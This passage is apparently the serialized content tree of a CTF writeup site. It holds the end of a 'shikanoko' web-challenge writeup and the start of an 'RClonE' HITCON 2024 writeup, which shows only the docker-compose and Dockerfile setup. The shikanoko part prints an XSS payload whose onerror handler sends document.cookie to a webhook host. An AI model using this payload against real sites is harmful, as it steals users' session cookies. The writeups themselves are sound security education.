996,"children":21997},{"style":676},[21998],{"type":38,"value":669},{"type":33,"tag":128,"props":22000,"children":22001},{"style":140},[22002],{"type":38,"value":38},{"type":33,"tag":128,"props":22004,"children":22005},{"style":676},[22006],{"type":38,"value":669},{"type":33,"tag":128,"props":22008,"children":22009},{"style":306},[22010],{"type":38,"v
alue":14688},{"type":33,"tag":128,"props":22012,"children":22013},{"style":312},[22014],{"type":38,"value":315},{"type":33,"tag":128,"props":22016,"children":22017},{"style":676},[22018],{"type":38,"value":669},{"type":33,"tag":128,"props":22020,"children":22021},{"style":140},[22022],{"type":38,"value":21018},{"type":33,"tag":128,"props":22024,"children":22025},{"style":676},[22026],{"type":38,"value":669},{"type":33,"tag":128,"props":22028,"children":22029},{"style":306},[22030],{"type":38,"value":14928},{"type":33,"tag":128,"props":22032,"children":22033},{"style":312},[22034],{"type":38,"value":315},{"type":33,"tag":128,"props":22036,"children":22037},{"style":676},[22038],{"type":38,"value":669},{"type":33,"tag":128,"props":22040,"children":22041},{"style":140},[22042],{"type":38,"value":14941},{"type":33,"tag":128,"props":22044,"children":22045},{"style":676},[22046],{"type":38,"value":669},{"type":33,"tag":128,"props":22048,"children":22049},{"style":312},[22050],{"type":38,"value":6097},{"type":33,"tag":128,"props":22052,"children":22053},{"class":130,"line":804},[22054,22058,22062],{"type":33,"tag":128,"props":22055,"children":22056},{"style":312},[22057],{"type":38,"value":6206},{"type":33,"tag":128,"props":22059,"children":22060},{"style":1576},[22061],{"type":38,"value":5671},{"type":33,"tag":128,"props":22063,"children":22064},{"style":312},[22065],{"type":38,"value":6097},{"type":33,"tag":128,"props":22067,"children":22068},{"class":130,"line":839},[22069,22073,22077],{"type":33,"tag":128,"props":22070,"children":22071},{"style":312},[22072],{"type":38,"value":6067},{"type":33,"tag":128,"props":22074,"children":22075},{"style":1576},[22076],{"type":38,"value":15064},{"type":33,"tag":128,"props":22078,"children":22079},{"style":312},[22080],{"type":38,"value":6097},{"type":33,"tag":128,"props":22082,"children":22083},{"class":130,"line":848},[22084,22088,22092,22096,22100],{"type":33,"tag":128,"props":22085,"children":22086},{"style":312},[22087],{"type
":38,"value":21532},{"type":33,"tag":128,"props":22089,"children":22090},{"style":300},[22091],{"type":38,"value":13862},{"type":33,"tag":128,"props":22093,"children":22094},{"style":312},[22095],{"type":38,"value":13259},{"type":33,"tag":128,"props":22097,"children":22098},{"style":312},[22099],{"type":38,"value":5625},{"type":33,"tag":128,"props":22101,"children":22102},{"style":312},[22103],{"type":38,"value":762},{"type":33,"tag":128,"props":22105,"children":22106},{"class":130,"line":976},[22107,22111,22115,22119,22123,22127,22131,22135,22139,22143,22147,22151,22155,22159,22163,22167,22171,22175],{"type":33,"tag":128,"props":22108,"children":22109},{"style":300},[22110],{"type":38,"value":19683},{"type":33,"tag":128,"props":22112,"children":22113},{"style":135},[22114],{"type":38,"value":19688},{"type":33,"tag":128,"props":22116,"children":22117},{"style":312},[22118],{"type":38,"value":5657},{"type":33,"tag":128,"props":22120,"children":22121},{"style":312},[22122],{"type":38,"value":2852},{"type":33,"tag":128,"props":22124,"children":22125},{"style":306},[22126],{"type":38,"value":19701},{"type":33,"tag":128,"props":22128,"children":22129},{"style":312},[22130],{"type":38,"value":2966},{"type":33,"tag":128,"props":22132,"children":22133},{"style":312},[22134],{"type":38,"value":5625},{"type":33,"tag":128,"props":22136,"children":22137},{"style":300},[22138],{"type":38,"value":13061},{"type":33,"tag":128,"props":22140,"children":22141},{"style":437},[22142],{"type":38,"value":13066},{"type":33,"tag":128,"props":22144,"children":22145},{"style":312},[22146],{"type":38,"value":5566},{"type":33,"tag":128,"props":22148,"children":22149},{"style":306},[22150],{"type":38,"value":13076},{"type":33,"tag":128,"props":22152,"children":22153},{"style":312},[22154],{"type":38,"value":5625},{"type":33,"tag":128,"props":22156,"children":22157},{"style":135},[22158],{"type":38,"value":19734},{"type":33,"tag":128,"props":22160,"children":22161},{"style":312},[22162],{"type":3
8,"value":5566},{"type":33,"tag":128,"props":22164,"children":22165},{"style":306},[22166],{"type":38,"value":13076},{"type":33,"tag":128,"props":22168,"children":22169},{"style":312},[22170],{"type":38,"value":5584},{"type":33,"tag":128,"props":22172,"children":22173},{"style":306},[22174],{"type":38,"value":19751},{"type":33,"tag":128,"props":22176,"children":22177},{"style":312},[22178],{"type":38,"value":9722},{"type":33,"tag":128,"props":22180,"children":22181},{"class":130,"line":988},[22182,22186,22190,22194,22198],{"type":33,"tag":128,"props":22183,"children":22184},{"style":1576},[22185],{"type":38,"value":19763},{"type":33,"tag":128,"props":22187,"children":22188},{"style":135},[22189],{"type":38,"value":19688},{"type":33,"tag":128,"props":22191,"children":22192},{"style":312},[22193],{"type":38,"value":5566},{"type":33,"tag":128,"props":22195,"children":22196},{"style":523},[22197],{"type":38,"value":78},{"type":33,"tag":128,"props":22199,"children":22200},{"style":312},[22201],{"type":38,"value":5815},{"type":33,"tag":128,"props":22203,"children":22204},{"class":130,"line":1001},[22205,22209,22213,22217,22221,22225,22230,22234],{"type":33,"tag":128,"props":22206,"children":22207},{"style":306},[22208],{"type":38,"value":21654},{"type":33,"tag":128,"props":22210,"children":22211},{"style":312},[22212],{"type":38,"value":215},{"type":33,"tag":128,"props":22214,"children":22215},{"style":306},[22216],{"type":38,"value":8275},{"type":33,"tag":128,"props":22218,"children":22219},{"style":312},[22220],{"type":38,"value":5657},{"type":33,"tag":128,"props":22222,"children":22223},{"style":676},[22224],{"type":38,"value":5710},{"type":33,"tag":128,"props":22226,"children":22227},{"style":140},[22228],{"type":38,"value":22229},"http://proxy/?html=\u003Cinput name=\"aaa\" value=\">{{VALUE}}hello\u003Cimg src=x onerror=window.location='https://webhook/?flag='+btoa(document.cookie)>\" data-value=\"DDDDD{{VALUE}}aaaaa id=asrc=x name=\"ooo\" 
type=\"image\">",{"type":33,"tag":128,"props":22231,"children":22232},{"style":676},[22233],{"type":38,"value":5739},{"type":33,"tag":128,"props":22235,"children":22236},{"style":312},[22237],{"type":38,"value":5676},{"type":33,"tag":128,"props":22239,"children":22240},{"class":130,"line":1014},[22241,22245,22249,22253,22257,22261,22265,22269,22273,22277],{"type":33,"tag":128,"props":22242,"children":22243},{"style":306},[22244],{"type":38,"value":19824},{"type":33,"tag":128,"props":22246,"children":22247},{"style":312},[22248],{"type":38,"value":5657},{"type":33,"tag":128,"props":22250,"children":22251},{"style":306},[22252],{"type":38,"value":7562},{"type":33,"tag":128,"props":22254,"children":22255},{"style":312},[22256],{"type":38,"value":215},{"type":33,"tag":128,"props":22258,"children":22259},{"style":135},[22260],{"type":38,"value":19841},{"type":33,"tag":128,"props":22262,"children":22263},{"style":312},[22264],{"type":38,"value":5566},{"type":33,"tag":128,"props":22266,"children":22267},{"style":676},[22268],{"type":38,"value":669},{"type":33,"tag":128,"props":22270,"children":22271},{"style":140},[22272],{"type":38,"value":5929},{"type":33,"tag":128,"props":22274,"children":22275},{"style":676},[22276],{"type":38,"value":669},{"type":33,"tag":128,"props":22278,"children":22279},{"style":312},[22280],{"type":38,"value":5815},{"type":33,"tag":128,"props":22282,"children":22283},{"class":130,"line":1026},[22284,22288,22292,22296,22300,22304,22308,22312],{"type":33,"tag":128,"props":22285,"children":22286},{"style":306},[22287],{"type":38,"value":19824},{"type":33,"tag":128,"props":22289,"children":22290},{"style":312},[22291],{"type":38,"value":215},{"type":33,"tag":128,"props":22293,"children":22294},{"style":306},[22295],{"type":38,"value":14160},{"type":33,"tag":128,"props":22297,"children":22298},{"style":312},[22299],{"type":38,"value":5657},{"type":33,"tag":128,"props":22301,"children":22302},{"style":676},[22303],{"type":38,"value":679},{"type":33,"ta
g":128,"props":22305,"children":22306},{"style":140},[22307],{"type":38,"value":19454},{"type":33,"tag":128,"props":22309,"children":22310},{"style":676},[22311],{"type":38,"value":669},{"type":33,"tag":128,"props":22313,"children":22314},{"style":312},[22315],{"type":38,"value":5676},{"type":33,"tag":128,"props":22317,"children":22318},{"class":130,"line":1038},[22319,22323,22327,22331,22335,22339,22343,22347,22351,22355],{"type":33,"tag":128,"props":22320,"children":22321},{"style":300},[22322],{"type":38,"value":19904},{"type":33,"tag":128,"props":22324,"children":22325},{"style":306},[22326],{"type":38,"value":17575},{"type":33,"tag":128,"props":22328,"children":22329},{"style":312},[22330],{"type":38,"value":5657},{"type":33,"tag":128,"props":22332,"children":22333},{"style":300},[22334],{"type":38,"value":13061},{"type":33,"tag":128,"props":22336,"children":22337},{"style":135},[22338],{"type":38,"value":19921},{"type":33,"tag":128,"props":22340,"children":22341},{"style":312},[22342],{"type":38,"value":5566},{"type":33,"tag":128,"props":22344,"children":22345},{"style":676},[22346],{"type":38,"value":6040},{"type":33,"tag":128,"props":22348,"children":22349},{"style":140},[22350],{"type":38,"value":17521},{"type":33,"tag":128,"props":22352,"children":22353},{"style":676},[22354],{"type":38,"value":6040},{"type":33,"tag":128,"props":22356,"children":22357},{"style":312},[22358],{"type":38,"value":5815},{"type":33,"tag":128,"props":22360,"children":22361},{"class":130,"line":1051},[22362,22366,22370,22374,22378,22382],{"type":33,"tag":128,"props":22363,"children":22364},{"style":306},[22365],{"type":38,"value":19824},{"type":33,"tag":128,"props":22367,"children":22368},{"style":312},[22369],{"type":38,"value":215},{"type":33,"tag":128,"props":22371,"children":22372},{"style":135},[22373],{"type":38,"value":19957},{"type":33,"tag":128,"props":22375,"children":22376},{"style":312},[22377],{"type":38,"value":5566},{"type":33,"tag":128,"props":22379,"children":2238
0},{"style":306},[22381],{"type":38,"value":17546},{"type":33,"tag":128,"props":22383,"children":22384},{"style":312},[22385],{"type":38,"value":5815},{"type":33,"tag":128,"props":22387,"children":22388},{"class":130,"line":1063},[22389],{"type":33,"tag":128,"props":22390,"children":22391},{"style":312},[22392],{"type":38,"value":19977},{"type":33,"tag":128,"props":22394,"children":22395},{"class":130,"line":1076},[22396,22400,22404],{"type":33,"tag":128,"props":22397,"children":22398},{"style":312},[22399],{"type":38,"value":6206},{"type":33,"tag":128,"props":22401,"children":22402},{"style":1576},[22403],{"type":38,"value":15064},{"type":33,"tag":128,"props":22405,"children":22406},{"style":312},[22407],{"type":38,"value":6097},{"type":33,"tag":128,"props":22409,"children":22410},{"class":130,"line":1089},[22411,22415,22419],{"type":33,"tag":128,"props":22412,"children":22413},{"style":312},[22414],{"type":38,"value":6190},{"type":33,"tag":128,"props":22416,"children":22417},{"style":1576},[22418],{"type":38,"value":5929},{"type":33,"tag":128,"props":22420,"children":22421},{"style":312},[22422],{"type":38,"value":6097},{"type":33,"tag":47,"props":22424,"children":22425},{},[22426],{"type":38,"value":22427},"And voilà, we have the 
flag:",{"type":33,"tag":75,"props":22429,"children":22431},{"imgSrc":22430},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1731972549/writeups/shikanoko/response_from_bot_flag.webp",[],{"type":33,"tag":5227,"props":22433,"children":22434},{},[22435],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":22437},[22438,22439,22440,22441,22442,22443],{"id":42,"depth":362,"text":45},{"id":12032,"depth":362,"text":12035},{"id":14523,"depth":362,"text":14526},{"id":19313,"depth":362,"text":12046},{"id":20071,"depth":362,"text":20074},{"id":21053,"depth":362,"text":21056},"content:writeups:shikanoko.md","writeups/shikanoko.md","writeups/shikanoko",{"_path":22448,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":22449,"description":8,"head":22450,"body":22468,"_type":5240,"_id":25204,"_source":5242,"_file":25205,"_stem":25206,"_extension":5245},"/writeups/rclone","RClonE",{"title":22449,"description":22451,"keywords":22452,"slug":22453,"image":22454,"date":22455,"meta":22456},"RClonE was a web challenge from Hitcon qual 2024.","web,csrf,rce","rclone","https://res.cloudinary.com/dmju5zuhr/image/upload/v1721341554/writeups/hitcon_ctf.webp","2024-07-16",[22457,22458,22459,22460,22461,22463,22464,22466],{"og:image":22454},{"og:title":22449},{"og:description":22451},{"og:type":21},{"og:url":22462},"https://owalid.com/rclone",{"description":22451},{"title":22465},"RClonE 
writeup",{"keywords":22467},"web,csrf,rce,writeup,hitcon,ctf",{"type":30,"children":22469,"toc":25197},[22470,22474,22478,22482,22486,22490,22495,22879,22885,22890,22906,22911,23194,23199,23513,23873,23878,23883,23889,23903,23908,23912,23925,23930,23973,23978,23982,23987,24018,24026,24031,24036,24044,24048,24053,24057,24062,24067,24073,24087,24091,24103,24117,24121,24126,24131,24136,24141,24183,24188,24193,24378,24383,24597,24610,24819,24824,24828,24833,24837,24842,24846,24851,24929,24934,24968,24973,25174,25179,25184,25189,25193],{"type":33,"tag":34,"props":22471,"children":22472},{"id":22453},[22473],{"type":38,"value":22449},{"type":33,"tag":40,"props":22475,"children":22476},{"id":42},[22477],{"type":38,"value":45},{"type":33,"tag":47,"props":22479,"children":22480},{},[22481],{"type":38,"value":22451},{"type":33,"tag":47,"props":22483,"children":22484},{},[22485],{"type":38,"value":5300},{"type":33,"tag":75,"props":22487,"children":22489},{"imgSrc":22488},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721244495/writeups/rclone/archi.webp",[],{"type":33,"tag":47,"props":22491,"children":22492},{},[22493],{"type":38,"value":22494},"To begin with, we have two services that are launched from a docker-compose, one which is a bot that accesses the internet and one which is an Rclone service.",{"type":33,"tag":114,"props":22496,"children":22497},{"lang":11545},[22498],{"type":33,"tag":119,"props":22499,"children":22501},{"code":22500,"language":11545,"meta":8,"className":11549,"style":8},"services:\n  rclone:\n    image: rclone\n    build: .\n    environment:\n      - SECRET=secret  # randomized secret per instancer\n    ports:\n      - \"5572:5572\"\n    networks:\n      - chall\n  bot:\n    image: rclone-bot\n    build: ./bot\n    environment:\n      - TITLE=Admin Bot for RClonE\n      - PORT=8000\n      - URL_CHECK_REGEX=^https?://.{1,256}$\n      - SECRET=secret  # randomized secret per instancer\n    security_opt: \n      - seccomp=chrome.json\n    
ports:\n      - \"8000:8000\"\n    networks:\n      - default\n      - chall\nnetworks:\n  chall:\n    internal: true\n",[22502],{"type":33,"tag":105,"props":22503,"children":22504},{"__ignoreMap":8},[22505,22516,22528,22544,22559,22570,22587,22598,22618,22629,22641,22652,22668,22684,22695,22707,22719,22731,22746,22762,22774,22785,22805,22816,22828,22839,22850,22862],{"type":33,"tag":128,"props":22506,"children":22507},{"class":130,"line":131},[22508,22512],{"type":33,"tag":128,"props":22509,"children":22510},{"style":437},[22511],{"type":38,"value":11593},{"type":33,"tag":128,"props":22513,"children":22514},{"style":312},[22515],{"type":38,"value":5318},{"type":33,"tag":128,"props":22517,"children":22518},{"class":130,"line":362},[22519,22524],{"type":33,"tag":128,"props":22520,"children":22521},{"style":437},[22522],{"type":38,"value":22523},"  rclone",{"type":33,"tag":128,"props":22525,"children":22526},{"style":312},[22527],{"type":38,"value":5318},{"type":33,"tag":128,"props":22529,"children":22530},{"class":130,"line":403},[22531,22535,22539],{"type":33,"tag":128,"props":22532,"children":22533},{"style":437},[22534],{"type":38,"value":11617},{"type":33,"tag":128,"props":22536,"children":22537},{"style":312},[22538],{"type":38,"value":284},{"type":33,"tag":128,"props":22540,"children":22541},{"style":140},[22542],{"type":38,"value":22543}," 
rclone\n",{"type":33,"tag":128,"props":22545,"children":22546},{"class":130,"line":739},[22547,22551,22555],{"type":33,"tag":128,"props":22548,"children":22549},{"style":437},[22550],{"type":38,"value":11772},{"type":33,"tag":128,"props":22552,"children":22553},{"style":312},[22554],{"type":38,"value":284},{"type":33,"tag":128,"props":22556,"children":22557},{"style":523},[22558],{"type":38,"value":5220},{"type":33,"tag":128,"props":22560,"children":22561},{"class":130,"line":765},[22562,22566],{"type":33,"tag":128,"props":22563,"children":22564},{"style":437},[22565],{"type":38,"value":11803},{"type":33,"tag":128,"props":22567,"children":22568},{"style":312},[22569],{"type":38,"value":5318},{"type":33,"tag":128,"props":22571,"children":22572},{"class":130,"line":804},[22573,22577,22582],{"type":33,"tag":128,"props":22574,"children":22575},{"style":312},[22576],{"type":38,"value":11663},{"type":33,"tag":128,"props":22578,"children":22579},{"style":140},[22580],{"type":38,"value":22581}," SECRET=secret",{"type":33,"tag":128,"props":22583,"children":22584},{"style":5541},[22585],{"type":38,"value":22586},"  # randomized secret per 
instancer\n",{"type":33,"tag":128,"props":22588,"children":22589},{"class":130,"line":839},[22590,22594],{"type":33,"tag":128,"props":22591,"children":22592},{"style":437},[22593],{"type":38,"value":11651},{"type":33,"tag":128,"props":22595,"children":22596},{"style":312},[22597],{"type":38,"value":5318},{"type":33,"tag":128,"props":22599,"children":22600},{"class":130,"line":848},[22601,22605,22609,22614],{"type":33,"tag":128,"props":22602,"children":22603},{"style":312},[22604],{"type":38,"value":11663},{"type":33,"tag":128,"props":22606,"children":22607},{"style":676},[22608],{"type":38,"value":679},{"type":33,"tag":128,"props":22610,"children":22611},{"style":140},[22612],{"type":38,"value":22613},"5572:5572",{"type":33,"tag":128,"props":22615,"children":22616},{"style":676},[22617],{"type":38,"value":836},{"type":33,"tag":128,"props":22619,"children":22620},{"class":130,"line":976},[22621,22625],{"type":33,"tag":128,"props":22622,"children":22623},{"style":437},[22624],{"type":38,"value":11712},{"type":33,"tag":128,"props":22626,"children":22627},{"style":312},[22628],{"type":38,"value":5318},{"type":33,"tag":128,"props":22630,"children":22631},{"class":130,"line":988},[22632,22636],{"type":33,"tag":128,"props":22633,"children":22634},{"style":312},[22635],{"type":38,"value":11663},{"type":33,"tag":128,"props":22637,"children":22638},{"style":140},[22639],{"type":38,"value":22640}," 
chall\n",{"type":33,"tag":128,"props":22642,"children":22643},{"class":130,"line":1001},[22644,22648],{"type":33,"tag":128,"props":22645,"children":22646},{"style":437},[22647],{"type":38,"value":11760},{"type":33,"tag":128,"props":22649,"children":22650},{"style":312},[22651],{"type":38,"value":5318},{"type":33,"tag":128,"props":22653,"children":22654},{"class":130,"line":1014},[22655,22659,22663],{"type":33,"tag":128,"props":22656,"children":22657},{"style":437},[22658],{"type":38,"value":11617},{"type":33,"tag":128,"props":22660,"children":22661},{"style":312},[22662],{"type":38,"value":284},{"type":33,"tag":128,"props":22664,"children":22665},{"style":140},[22666],{"type":38,"value":22667}," rclone-bot\n",{"type":33,"tag":128,"props":22669,"children":22670},{"class":130,"line":1026},[22671,22675,22679],{"type":33,"tag":128,"props":22672,"children":22673},{"style":437},[22674],{"type":38,"value":11772},{"type":33,"tag":128,"props":22676,"children":22677},{"style":312},[22678],{"type":38,"value":284},{"type":33,"tag":128,"props":22680,"children":22681},{"style":140},[22682],{"type":38,"value":22683}," ./bot\n",{"type":33,"tag":128,"props":22685,"children":22686},{"class":130,"line":1038},[22687,22691],{"type":33,"tag":128,"props":22688,"children":22689},{"style":437},[22690],{"type":38,"value":11803},{"type":33,"tag":128,"props":22692,"children":22693},{"style":312},[22694],{"type":38,"value":5318},{"type":33,"tag":128,"props":22696,"children":22697},{"class":130,"line":1051},[22698,22702],{"type":33,"tag":128,"props":22699,"children":22700},{"style":312},[22701],{"type":38,"value":11663},{"type":33,"tag":128,"props":22703,"children":22704},{"style":140},[22705],{"type":38,"value":22706}," TITLE=Admin Bot for 
RClonE\n",{"type":33,"tag":128,"props":22708,"children":22709},{"class":130,"line":1063},[22710,22714],{"type":33,"tag":128,"props":22711,"children":22712},{"style":312},[22713],{"type":38,"value":11663},{"type":33,"tag":128,"props":22715,"children":22716},{"style":140},[22717],{"type":38,"value":22718}," PORT=8000\n",{"type":33,"tag":128,"props":22720,"children":22721},{"class":130,"line":1076},[22722,22726],{"type":33,"tag":128,"props":22723,"children":22724},{"style":312},[22725],{"type":38,"value":11663},{"type":33,"tag":128,"props":22727,"children":22728},{"style":140},[22729],{"type":38,"value":22730}," URL_CHECK_REGEX=^https?://.{1,256}$\n",{"type":33,"tag":128,"props":22732,"children":22733},{"class":130,"line":1089},[22734,22738,22742],{"type":33,"tag":128,"props":22735,"children":22736},{"style":312},[22737],{"type":38,"value":11663},{"type":33,"tag":128,"props":22739,"children":22740},{"style":140},[22741],{"type":38,"value":22581},{"type":33,"tag":128,"props":22743,"children":22744},{"style":5541},[22745],{"type":38,"value":22586},{"type":33,"tag":128,"props":22747,"children":22748},{"class":130,"line":1101},[22749,22754,22758],{"type":33,"tag":128,"props":22750,"children":22751},{"style":437},[22752],{"type":38,"value":22753},"    security_opt",{"type":33,"tag":128,"props":22755,"children":22756},{"style":312},[22757],{"type":38,"value":284},{"type":33,"tag":128,"props":22759,"children":22760},{"style":323},[22761],{"type":38,"value":2008},{"type":33,"tag":128,"props":22763,"children":22764},{"class":130,"line":1114},[22765,22769],{"type":33,"tag":128,"props":22766,"children":22767},{"style":312},[22768],{"type":38,"value":11663},{"type":33,"tag":128,"props":22770,"children":22771},{"style":140},[22772],{"type":38,"value":22773}," 
seccomp=chrome.json\n",{"type":33,"tag":128,"props":22775,"children":22776},{"class":130,"line":1127},[22777,22781],{"type":33,"tag":128,"props":22778,"children":22779},{"style":437},[22780],{"type":38,"value":11651},{"type":33,"tag":128,"props":22782,"children":22783},{"style":312},[22784],{"type":38,"value":5318},{"type":33,"tag":128,"props":22786,"children":22787},{"class":130,"line":1139},[22788,22792,22796,22801],{"type":33,"tag":128,"props":22789,"children":22790},{"style":312},[22791],{"type":38,"value":11663},{"type":33,"tag":128,"props":22793,"children":22794},{"style":676},[22795],{"type":38,"value":679},{"type":33,"tag":128,"props":22797,"children":22798},{"style":140},[22799],{"type":38,"value":22800},"8000:8000",{"type":33,"tag":128,"props":22802,"children":22803},{"style":676},[22804],{"type":38,"value":836},{"type":33,"tag":128,"props":22806,"children":22807},{"class":130,"line":1152},[22808,22812],{"type":33,"tag":128,"props":22809,"children":22810},{"style":437},[22811],{"type":38,"value":11712},{"type":33,"tag":128,"props":22813,"children":22814},{"style":312},[22815],{"type":38,"value":5318},{"type":33,"tag":128,"props":22817,"children":22818},{"class":130,"line":1165},[22819,22823],{"type":33,"tag":128,"props":22820,"children":22821},{"style":312},[22822],{"type":38,"value":11663},{"type":33,"tag":128,"props":22824,"children":22825},{"style":140},[22826],{"type":38,"value":22827}," 
default\n",{"type":33,"tag":128,"props":22829,"children":22830},{"class":130,"line":1177},[22831,22835],{"type":33,"tag":128,"props":22832,"children":22833},{"style":312},[22834],{"type":38,"value":11663},{"type":33,"tag":128,"props":22836,"children":22837},{"style":140},[22838],{"type":38,"value":22640},{"type":33,"tag":128,"props":22840,"children":22841},{"class":130,"line":1189},[22842,22846],{"type":33,"tag":128,"props":22843,"children":22844},{"style":437},[22845],{"type":38,"value":12003},{"type":33,"tag":128,"props":22847,"children":22848},{"style":312},[22849],{"type":38,"value":5318},{"type":33,"tag":128,"props":22851,"children":22852},{"class":130,"line":1202},[22853,22858],{"type":33,"tag":128,"props":22854,"children":22855},{"style":437},[22856],{"type":38,"value":22857},"  chall",{"type":33,"tag":128,"props":22859,"children":22860},{"style":312},[22861],{"type":38,"value":5318},{"type":33,"tag":128,"props":22863,"children":22864},{"class":130,"line":1214},[22865,22870,22874],{"type":33,"tag":128,"props":22866,"children":22867},{"style":437},[22868],{"type":38,"value":22869},"    internal",{"type":33,"tag":128,"props":22871,"children":22872},{"style":312},[22873],{"type":38,"value":284},{"type":33,"tag":128,"props":22875,"children":22876},{"style":1576},[22877],{"type":38,"value":22878}," true\n",{"type":33,"tag":40,"props":22880,"children":22882},{"id":22881},"recon",[22883],{"type":38,"value":22884},"Recon",{"type":33,"tag":47,"props":22886,"children":22887},{},[22888],{"type":38,"value":22889},"Before we start, we need to define what Rclone is.",{"type":33,"tag":22891,"props":22892,"children":22893},"blockquote",{},[22894],{"type":33,"tag":47,"props":22895,"children":22896},{},[22897,22899],{"type":38,"value":22898},"Rclone is an open source, multi threaded, command line computer program to manage or migrate content on cloud and other high latency storage. Its capabilities include sync, transfer, crypt, cache, union, compress and mount. 
The rclone website lists supported backends including S3 and Google Drive. ",{"type":33,"tag":53,"props":22900,"children":22903},{"href":22901,"rel":22902,":target":21222},"https://en.wikipedia.org/wiki/Rclone",[57],[22904],{"type":38,"value":22905},"Wikis",{"type":33,"tag":47,"props":22907,"children":22908},{},[22909],{"type":38,"value":22910},"Now that we know what Rclone is, we can talk about the services launched by the challenge in detail. In the Dockerfile of the Rclone service, you can see that it is launched as an rc daemon with the web interface enabled (--rc-web-gui), protected by the SECRET value used as both the rc user and the rc password.",{"type":33,"tag":114,"props":22912,"children":22913},{"lang":9966},[22914],{"type":33,"tag":119,"props":22915,"children":22918},{"code":22916,"language":9966,"meta":8,"className":22917,"style":8},"FROM debian:bookworm-slim\n\nRUN apt-get update && \\\n    apt-get install -y tini ca-certificates curl unzip && \\\n    apt-get clean && \\\n    rm -rf /var/lib/apt/lists/*\nWORKDIR /workdir\n\nARG RCLONE_VERSION=v1.67.0\nARG RCLONE_NAME=rclone-$RCLONE_VERSION-linux-amd64\nARG RCLONE_HASH=07c23d21a94d70113d949253478e13261c54d14d72023bb14d96a8da5f3e7722\n\nRUN curl https://downloads.rclone.org/$RCLONE_VERSION/$RCLONE_NAME.zip -o rclone.zip && \\\n    echo $RCLONE_HASH rclone.zip | sha256sum -c && \\\n    unzip rclone.zip && \\\n    mv $RCLONE_NAME/rclone /usr/bin\n\nCOPY ./readflag /readflag\nRUN chmod 111 /readflag\n\nRUN useradd -ms /bin/bash ctf\nUSER ctf\n\nENTRYPOINT [\"tini\", \"--\"]\nCMD rclone rcd --rc-addr 0.0.0.0:5572 --rc-web-gui --rc-user $SECRET --rc-pass $SECRET --rc-web-gui-no-open-browser\n","language-docker shiki shiki-themes 
vitesse-dark",[22919],{"type":33,"tag":105,"props":22920,"children":22921},{"__ignoreMap":8},[22922,22935,22942,22955,22963,22971,22979,22992,22999,23012,23024,23036,23043,23055,23063,23071,23079,23086,23099,23111,23118,23130,23143,23150,23181],{"type":33,"tag":128,"props":22923,"children":22924},{"class":130,"line":131},[22925,22930],{"type":33,"tag":128,"props":22926,"children":22927},{"style":1576},[22928],{"type":38,"value":22929},"FROM",{"type":33,"tag":128,"props":22931,"children":22932},{"style":323},[22933],{"type":38,"value":22934}," debian:bookworm-slim\n",{"type":33,"tag":128,"props":22936,"children":22937},{"class":130,"line":362},[22938],{"type":33,"tag":128,"props":22939,"children":22940},{"emptyLinePlaceholder":896},[22941],{"type":38,"value":899},{"type":33,"tag":128,"props":22943,"children":22944},{"class":130,"line":403},[22945,22950],{"type":33,"tag":128,"props":22946,"children":22947},{"style":1576},[22948],{"type":38,"value":22949},"RUN",{"type":33,"tag":128,"props":22951,"children":22952},{"style":323},[22953],{"type":38,"value":22954}," apt-get update && \\\n",{"type":33,"tag":128,"props":22956,"children":22957},{"class":130,"line":739},[22958],{"type":33,"tag":128,"props":22959,"children":22960},{"style":323},[22961],{"type":38,"value":22962},"    apt-get install -y tini ca-certificates curl unzip && \\\n",{"type":33,"tag":128,"props":22964,"children":22965},{"class":130,"line":765},[22966],{"type":33,"tag":128,"props":22967,"children":22968},{"style":323},[22969],{"type":38,"value":22970},"    apt-get clean && \\\n",{"type":33,"tag":128,"props":22972,"children":22973},{"class":130,"line":804},[22974],{"type":33,"tag":128,"props":22975,"children":22976},{"style":323},[22977],{"type":38,"value":22978},"    rm -rf 
/var/lib/apt/lists/*\n",{"type":33,"tag":128,"props":22980,"children":22981},{"class":130,"line":839},[22982,22987],{"type":33,"tag":128,"props":22983,"children":22984},{"style":1576},[22985],{"type":38,"value":22986},"WORKDIR",{"type":33,"tag":128,"props":22988,"children":22989},{"style":323},[22990],{"type":38,"value":22991}," /workdir\n",{"type":33,"tag":128,"props":22993,"children":22994},{"class":130,"line":848},[22995],{"type":33,"tag":128,"props":22996,"children":22997},{"emptyLinePlaceholder":896},[22998],{"type":38,"value":899},{"type":33,"tag":128,"props":23000,"children":23001},{"class":130,"line":976},[23002,23007],{"type":33,"tag":128,"props":23003,"children":23004},{"style":1576},[23005],{"type":38,"value":23006},"ARG",{"type":33,"tag":128,"props":23008,"children":23009},{"style":323},[23010],{"type":38,"value":23011}," RCLONE_VERSION=v1.67.0\n",{"type":33,"tag":128,"props":23013,"children":23014},{"class":130,"line":988},[23015,23019],{"type":33,"tag":128,"props":23016,"children":23017},{"style":1576},[23018],{"type":38,"value":23006},{"type":33,"tag":128,"props":23020,"children":23021},{"style":323},[23022],{"type":38,"value":23023}," RCLONE_NAME=rclone-$RCLONE_VERSION-linux-amd64\n",{"type":33,"tag":128,"props":23025,"children":23026},{"class":130,"line":1001},[23027,23031],{"type":33,"tag":128,"props":23028,"children":23029},{"style":1576},[23030],{"type":38,"value":23006},{"type":33,"tag":128,"props":23032,"children":23033},{"style":323},[23034],{"type":38,"value":23035}," 
RCLONE_HASH=07c23d21a94d70113d949253478e13261c54d14d72023bb14d96a8da5f3e7722\n",{"type":33,"tag":128,"props":23037,"children":23038},{"class":130,"line":1014},[23039],{"type":33,"tag":128,"props":23040,"children":23041},{"emptyLinePlaceholder":896},[23042],{"type":38,"value":899},{"type":33,"tag":128,"props":23044,"children":23045},{"class":130,"line":1026},[23046,23050],{"type":33,"tag":128,"props":23047,"children":23048},{"style":1576},[23049],{"type":38,"value":22949},{"type":33,"tag":128,"props":23051,"children":23052},{"style":323},[23053],{"type":38,"value":23054}," curl https://downloads.rclone.org/$RCLONE_VERSION/$RCLONE_NAME.zip -o rclone.zip && \\\n",{"type":33,"tag":128,"props":23056,"children":23057},{"class":130,"line":1038},[23058],{"type":33,"tag":128,"props":23059,"children":23060},{"style":323},[23061],{"type":38,"value":23062},"    echo $RCLONE_HASH rclone.zip | sha256sum -c && \\\n",{"type":33,"tag":128,"props":23064,"children":23065},{"class":130,"line":1051},[23066],{"type":33,"tag":128,"props":23067,"children":23068},{"style":323},[23069],{"type":38,"value":23070},"    unzip rclone.zip && 